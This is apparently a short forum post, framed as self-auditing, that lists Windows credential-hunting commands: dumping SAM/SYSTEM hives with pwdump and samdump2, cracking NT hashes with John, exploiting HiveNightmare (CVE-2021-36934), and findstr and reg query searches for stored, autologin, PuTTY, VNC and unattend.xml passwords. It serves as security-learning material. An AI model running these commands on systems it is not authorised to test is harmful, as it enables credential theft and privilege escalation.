Protecting yourself by checking your own password vulnerabilities.
Posted Jan 21, 2025 12:59 PM
For Windows - by default your passwords might be stored in some of the below areas, so check for your self and make sure it isn't easy for someone to gain that info.SAM is a database file where user passwords are stored in a hashed format in a registry either as a LM hash or as a NTLM hash.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
If you can get to this directory then, generate a hash file for John using pwdump.
pwdump SYSTEM SAM > /root/john.txt
samdump2 SYSTEM SAM -o john.txt
Then crack it with John -
john -format=NT /root/john.txt
HiveNightmare
CVE-2021–36934 allows you to retrieve all registry(SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user
This is an old Vulnerabiltiy but you might get lucky.
C:\Windows\System32> icacls config\SAM
config\SAM BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
Or try LAPS
Extract HKLM\Software\Policies\Microsoft Services\AdmPwd from Windows Registry.
LAPS Enabled: AdmPwdEnabled
LAPS Admin Account Name: AdminAccountName
LAPS Password Complexity: PasswordComplexity
LAPS Password Length: PasswordLength
LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
Search all files and Conent
cd C:\ & findstr /SI /M "password" .xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.
Search for a file with a certain filename
dir /S /B pass*.txt == *pass*.xml == *pass*.ini == *cred == vnc == .config
where /R C:\ user.txt
where /R C:\ *.ini
Search the registry for passwords
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Passwords in unattend.xml
Location of the unattend.xml files.
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Now show the content of these files with dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul.
There might be a few other places where the passwords are stored as well, but these are the easiest to get to from my experience. Im still learning myself, so if im missing any others please let me know.
